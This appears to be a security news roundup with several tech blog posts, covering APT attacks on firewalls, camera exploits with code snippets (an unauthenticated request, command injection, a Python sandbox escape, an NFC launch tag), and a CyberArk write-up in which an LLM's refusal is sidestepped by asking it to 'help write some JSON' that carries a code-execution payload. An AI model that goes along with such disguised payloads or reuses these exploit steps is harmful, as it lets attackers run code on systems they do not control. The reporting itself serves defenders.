This Week In Security: Playing Tag, Hacking Cameras, And More

Wired has a fascinating story this week about the lengths Sophos has gone to over the last five years to track down a group of malicious but clever security researchers who were continually discovering vulnerabilities and then using those findings to attack real-world targets. Sophos believes this adversary to be a set of overlapping Chinese groups known as APT31, APT41, and Volt Typhoon.

The story is actually refreshing in its honesty, with Sophos freely admitting that their products, along with security products from multiple other vendors, have been caught in the crosshairs of these attacks. And indeed, we’ve covered stories about these vulnerabilities over the past weeks and months right here in this column. The uncomfortable truth is that many of these security products have pretty severe security problems of their own.

The issues at Sophos started with an infection on an informational computer at a subsidiary office. They believe this was an information-gathering exercise that served as a precursor to the wider campaign. That campaign used multiple 0-days to crack “tens of thousands of firewalls around the world”. Sophos rolled out fixes for those 0-days, and quietly included a bit of extra logging as an undocumented feature. That logging paid off, as Sophos’ team of researchers soon identified an early signal in the telemetry. This wasn’t merely the first device to be attacked; it was actually a test device used to develop the attack. The game was on.

Sophos managed to deploy its own spyware to these test devices, stealthily keeping an eye on this clever opponent. That visibility even thwarted a later attack before it could really get started. Among the interesting observations was a bootkit infection on one of these firewalls. That technique was never found in the wild, but the very nature of such an attack makes it hard to discover.

There’s one more interesting wrinkle to this story. In at least one case, Sophos received the 0-day vulnerability used in an attack through their bug bounty program, right after the wave of attacks was launched. The timing, combined with the Chinese IP address, makes it pretty clear this was more than a coincidence. This might be a Chinese hacker making a bit of extra cash on the side. It’s also reminiscent of the Chinese law requiring companies to disclose vulnerabilities to the Chinese government.

PTZ 0-Day

GreyNoise runs a honeypot and an AI threat-detection system, and found something interesting with that combination. PTZOptics pan-tilt-zoom network cameras were the intended target, and a pair of vulnerabilities were being exploited. The first is a simple authorization bypass: sending HTTP requests without an authorization header to the param.cgi endpoint returns data with no authentication required. Ask for get_system_conf, and the system helpfully prints out valid usernames and password hashes. How convenient.
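
As a rough illustration of how simple that bypass is (a sketch based on the description above, not the exact probe GreyNoise observed; the URL path and query format here are assumptions), a single unauthenticated request is all it takes:

```python
# Minimal sketch of the authorization bypass described above. The camera address,
# URL path, and query format are assumptions for illustration, not a verified probe.
import requests

CAMERA = "http://192.0.2.10"  # placeholder address for a vulnerable device

# Note: no Authorization header at all. Patched firmware should reject this.
resp = requests.get(
    f"{CAMERA}/cgi-bin/param.cgi",
    params={"get_system_conf": ""},
    timeout=5,
)
print(resp.status_code)
print(resp.text)  # on vulnerable firmware, this includes usernames and password hashes
```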

Gaining arbitrary command execution is trivial, as the NTP configuration isn’t properly sanitized and the ntp binary is called insecurely. A simple $(cmd) can be injected for easy execution. Those two flaws were being chained together into a dead-simple attack, presumably to add the IoT devices to a botnet. The flaws have been fixed, and law enforcement has been on the case, at least seizing the IP address observed in the attacks.
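
The underlying bug class is worth a quick sketch. The snippet below is a generic Python illustration of the pattern, not the camera’s actual firmware (which isn’t written in Python), with a hypothetical ntp_addr parameter standing in for the unsanitized setting:

```python
# Generic illustration of the command-injection pattern: an unsanitized config value
# interpolated into a shell command. Not the PTZOptics firmware; ntp_addr is a
# hypothetical stand-in for the vulnerable setting.
import subprocess

def set_ntp_server(ntp_addr: str) -> None:
    # BAD: shell=True plus string interpolation means $(...) is expanded by the shell
    subprocess.run(f"ntpdate {ntp_addr}", shell=True)

# The "NTP server" smuggles in a command substitution, which a POSIX shell evaluates
# before it even tries to run ntpdate:
set_ntp_server("pool.ntp.org $(touch /tmp/injected)")
```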

Speaking of camera hacks, we do have an impressive tale from Pwn2Own 2024, where researchers at Synacktiv used a format string vulnerability to pwn the Synology TC500 camera. The firmware in question had a whole alphabet of security features, like ASLR, PIE, NX, and Full RelRO. That’s Address Space Layout Randomization, Position Independent Executables, Non-Executable memory, and Full Relocation Read-Only protections. Oh, and the payload was limited to 128 characters, with the first 32 ASCII characters (the control codes) unavailable for use.

How exactly does one write an exploit under those constraints? A bit of a lucky break with the existing memory layout gave access to what the write-up calls a “looping pointer”: a pointer that points to itself, which is quite useful for working from offsets instead of precise memory locations. The format string vulnerability allowed a shell command to be written into unused memory, and then a bit of Return Oriented Programming, in the form of a ROP gadget, launches a system call on the saved command line. Impressive.

Maybe It Wasn’t a Great Idea

…to give LLMs code execution capabilities. That’s the conclusion we came to after reading CyberArk’s post on how to achieve Remote Code Execution on a Large Language Model. The trick here is that this particular project, LoLLMs, can run Python code on the backend to perform certain tasks, like doing math calculations. The implementation uses Python sandboxing, and naturally there’s a known way to defeat it. The escape can be pulled off just by getting the model to evaluate the right JSON snippet, but the model is smart enough to realize that something is off and refuses to evaluate the JSON.
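
For a sense of why sandboxing Python from inside Python is so fragile in general, here’s a generic sketch (not the specific bypass from CyberArk’s write-up): even with the builtins stripped out of eval(), the object graph still leads back to them.

```python
# Generic sketch of a Python sandbox escape; this is a well-known class of trick,
# not the specific LoLLMs bypass from CyberArk's post.
naive_sandbox = {"__builtins__": {}}  # naive attempt: no builtins available to eval()

# Walk from an empty tuple up to object, enumerate its subclasses, and borrow the
# builtins that warnings.catch_warnings keeps a reference to. The exact class that
# works this way can vary between Python versions.
payload = (
    "[c for c in ().__class__.__base__.__subclasses__()"
    " if c.__name__ == 'catch_warnings'][0]()"
    "._module.__builtins__['print']('escaped the sandbox')"
)

eval(payload, naive_sandbox)  # prints, despite builtins supposedly being removed
```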

The interesting detail here is that it is the LLM itself that is refusing, so it’s the LLM that needs to be bypassed. There has been some very interesting work done on LLM jailbreaks, like DAN, the “Do Anything Now” prompt. That would probably have worked, but this exploit can be even sneakier than that. Simply ask the LLM to help you write some JSON. Specify the payload, and ask it to add something to it. It gladly complies, and the code is executed. Who knew that LLMs were so gullible?

More Quantum Errata

This story just keeps on giving. This time it’s [Dan Goodin] at Ars Technica who has the lowdown, filling in the last few missing details about the much over-hyped quantum computing breakthrough. One of those details is that the claimed compromise of AES was first reported in the South China Morning Post, which has over-hyped Chinese quantum progress before. What [Goodin]’s article really adds to the discussion is opinions from experts, and the important takeaway is that the performance of the D-Wave quantum computer is comparable to classical approaches.

Bits and Bytes

Remember the traffic light hacking? And part two? We now have the third installment, which is really all about how you, too, can purchase and hack on one of these traffic controllers. It may or may not surprise you that the answer is to buy one on eBay and cobble together a makeshift power supply.

It’s amazing how often printers, point-of-sale terminals, and other IoT gadgets are just running stripped-down, ancient versions of Android. This point-of-sale system is no exception, running an old, custom Android 6 build that actually seems to be rather well locked down. Except that it has an NFC reader, and you can program NFC tags to launch Android apps. Use that creative workaround to get into the Android settings, and you’re in business.
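
For a rough idea of how such a tag gets built (a hedged sketch, assuming the ndeflib Python package; the target package name is purely illustrative and not taken from the write-up), an Android Application Record is just an NDEF external-type record carrying a package name:

```python
# Hedged sketch: building an NDEF message containing an Android Application Record
# (AAR), which Android uses to launch the named app when a tag is scanned.
# Assumes the ndeflib package (pip install ndeflib); actually writing the bytes to
# a physical tag requires an NFC reader/writer and its own tooling.
import ndef

# An AAR is an NFC Forum external type record, "android.com:pkg", whose payload is
# just a package name. "com.android.settings" here is an illustrative target.
aar = ndef.Record("urn:nfc:ext:android.com:pkg", "", b"com.android.settings")

tag_bytes = b"".join(ndef.message_encoder([aar]))
print(tag_bytes.hex())  # these are the bytes that would be written to the tag
```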

I have long maintained that printers are terrible. That sentiment apparently extends to security research on printers, with Lexmark moving to a new encrypted filesystem for printer firmware. Thankfully, like most of these schemes, it’s not foolproof, and [Peter] has the scoop on getting in. May you never need it. Because seriously, printers are the worst.

All System Prompts For Anthropic’s Claude, Revealed

For as long as AI Large Language Models have been around (well, for as long as modern ones have been accessible online, anyway) people have tried to coax the models into revealing their system prompts. The system prompt is essentially the model’s fundamental set of directives on what it should do and how it should act. Such healthy curiosity is rarely welcomed, however, and creative efforts at making a model cough up its instructions are frequently met with a figurative glare and a stern tapping of the Terms & Conditions sign.

Anthropic has bucked this trend by making the system prompts public for the web and mobile interfaces of all three incarnations of Claude. The prompt for Claude Opus (their flagship model) is well over 1,500 words long, with separate sections specifically for handling text and images. The prompt does things like help ensure Claude communicates in a useful way, taking into account the current date and an awareness of its knowledge cut-off, the date after which Claude has no knowledge of events. There’s some stylistic stuff in there as well, such as Claude being specifically told to avoid obsequious-sounding filler affirmations, like starting a response with any form of the word “Certainly.”

Continue reading “All System Prompts For Anthropic’s Claude, Revealed”

Large Language Models On Small Computers

As technology progresses, we generally expect processing capabilities to scale up. Every year, we get more processor power, faster speeds, greater memory, and lower cost. However, we can also use improvements in software to get things running on what might otherwise be considered inadequate hardware. Taking this to the extreme, while large language models (LLMs) like GPT are running out of data to train on and having difficulty scaling up, [DaveBben] is experimenting with scaling down instead, running an LLM on the smallest computer that could reasonably run one.

Of course, some concessions have to be made to get an LLM running on underpowered hardware. In this case, the computer of choice is an ESP32, so the model was shrunk from the trillions of parameters of something like GPT-4, or even the hundreds of billions of GPT-3, down to only 260,000. The weights come from the tinyllamas checkpoint, and llama2.c is the implementation that [DaveBben] chose for this setup, as it can be streamlined to run a bit better on something like the ESP32. The specific chip is the ESP32-S3FH4R2, which was chosen for its large amount of RAM compared to other versions, since even this tiny model needs a minimum of about 1 MB to run. It also has two cores, which both work as hard as possible under (relatively) heavy loads like these, and the CPU clock can be maxed out at around 240 MHz.
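
That 1 MB figure lines up with some quick back-of-the-envelope arithmetic (a rough estimate of the weight storage alone, not [DaveBben]’s exact memory budget):

```python
# Rough estimate of the memory needed just to hold the weights, ignoring activations
# and program overhead. Not DaveBben's exact numbers, just back-of-the-envelope math.
params = 260_000

for dtype, bytes_per_param in [("float32", 4), ("float16", 2), ("int8", 1)]:
    size_kib = params * bytes_per_param / 1024
    print(f"{dtype}: {size_kib:.0f} KiB")

# float32 alone works out to roughly 1016 KiB, i.e. right around 1 MB, which is why
# the comparatively RAM-rich ESP32-S3 variant matters here.
```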

Admittedly, [DaveBben] is mostly doing this just to see if it can be done, since even the most powerful ESP32 won’t be able to do much useful work with a large language model. It does turn out to be possible, though, and it’s somewhat impressive considering the ESP32 has about as much processing capability as a 486 or maybe an early Pentium chip, to put things in perspective. If you’re willing to devote a few more resources to an LLM, you can self-host it and use it in much the same way as an online model such as ChatGPT.


Hackaday Links: September 1, 2024

Why is it always a helium leak? It seems whenever there’s a scrubbed launch or a narrowly averted disaster, space exploration just can’t get past the problems of helium plumbing. We’ve had a bunch of helium problems lately, most famously with the leaks in Starliner’s thruster system that have prevented astronauts Butch Wilmore and Suni Williams from returning to Earth in the spacecraft, leaving them on an extended mission to the ISS. Ironically, the launch itself was troubled by a helium leak before the rocket ever left the ground. More recently, the Polaris Dawn mission, which is supposed to feature the first spacewalk by a private crew, was scrubbed by SpaceX due to a helium leak on the launch tower. And to round out the helium woes, we now have news that the Peregrine mission, which was supposed to carry the first commercial lander to the lunar surface but instead ended up burning up in the atmosphere and crashing into the Pacific, failed due to — you guessed it — a helium leak.
Continue reading “Hackaday Links: September 1, 2024”

Peering Into The Black Box Of Large Language Models

Large Language Models (LLMs) can produce extremely human-like communication, but their inner workings are something of a mystery. Not a mystery in the sense that we don’t know how an LLM works, but in the sense that the exact process of turning a particular input into a particular output is essentially a black box.

This “black box” trait is common to neural networks in general, and LLMs are very deep neural networks. It is not really possible to explain precisely why a specific input produces a particular output, and not something else.

Why? Because neural networks are neither databases, nor lookup tables. In a neural network, discrete activation of neurons cannot be meaningfully mapped to specific concepts or words. The connections are complex, numerous, and multidimensional to the point that trying to tease out their relationships in any straightforward way simply does not make sense.

Continue reading “Peering Into The Black Box Of Large Language Models”

Torment Poor Milton With Your Best Pixel Art

One of the great things about new tech tools is just having fun with them, like embracing your inner trickster god to mess with ‘Milton’, an AI trapped in an empty room.

Milton is trapped in a room is a pixel-art game with a simple premise: use a basic paint interface to add objects to the room, then watch and listen to Milton respond to them. That’s it? That’s it. The code is available in the GitHub repository, but there’s also a link to play it live without any kind of signup. Give it a try if you have a few spare minutes.

Under the hood, the basic loop is to let the user add something to the room, send the picture of the room (with its new contents) off for image recognition, then get Milton’s reaction to it. Milton is equal parts annoyed and jumpy, and his speech and reactions reflect this.
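
In rough pseudocode, that loop is easy to sketch. The Python mock-up below is just an illustration of the flow described above, not the actual project code (which is built on Open Souls), and vision_model() and milton_reply() are hypothetical stand-ins:

```python
# Hedged mock-up of the game loop described above; not the actual Open Souls code.
# vision_model() and milton_reply() stand in for the image-recognition and
# persona-LLM calls that the real game makes.
from typing import List

def vision_model(room_image: bytes) -> List[str]:
    """Pretend image recognition: return labels for what the player drew."""
    return ["a cactus", "a tiny door"]

def milton_reply(new_objects: List[str]) -> str:
    """Pretend persona call: Milton reacts, equal parts annoyed and jumpy."""
    return f"Why is there {' and '.join(new_objects)} in here? Who keeps doing this?"

def game_tick(room_image: bytes) -> str:
    objects = vision_model(room_image)  # 1. recognize the room's new contents
    return milton_reply(objects)        # 2. have Milton react to them

print(game_tick(b"placeholder image bytes"))
```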

The game is a bit of a concept demo for Open Souls, whose “thing” is providing AIs with far more personality and relatable behaviors than one typically expects from large language models. Maybe this is just what’s needed for AI opponents in things like the putting game of Connect Fore! to level up their trash talking.

NetBSD Bans AI-Generated Code From Commits

A recent change to the NetBSD commit guidelines states that code generated by Large Language Models (LLMs) or similar technologies, such as ChatGPT, Microsoft’s Copilot, or Meta’s Code Llama, is presumed to be tainted code. The amendment extends the existing section on tainted code, which originally referred to any code not written directly by the person committing it, and which exists because of licensing concerns. The obvious worry is that code could otherwise be copied into the NetBSD codebase under an incompatible (or proprietary) license.

In the case of LLM-based code generators like those mentioned above, the problem stems from the fact that they are trained on millions of lines of code from all over the internet, released under a wide variety of licenses. Invariably, some of that code is covered by a license that’s not acceptable for the NetBSD codebase. The guideline does note that auto-generated code may still be admissible, but it requires written permission from core developers, and presumably an in-depth audit of the code’s heritage. That should leave non-trivial commits churned out by ChatGPT and kin out in the cold.

The debate about the validity of works produced by current-gen “artificial intelligence” software is only just beginning, but there’s little question that NetBSD has made the right call here. From a legal and software-engineering perspective, this policy makes perfect sense, as LLM-generated code simply doesn’t meet the project’s standards. That said, code produced by humans brings with it a whole different set of potential problems.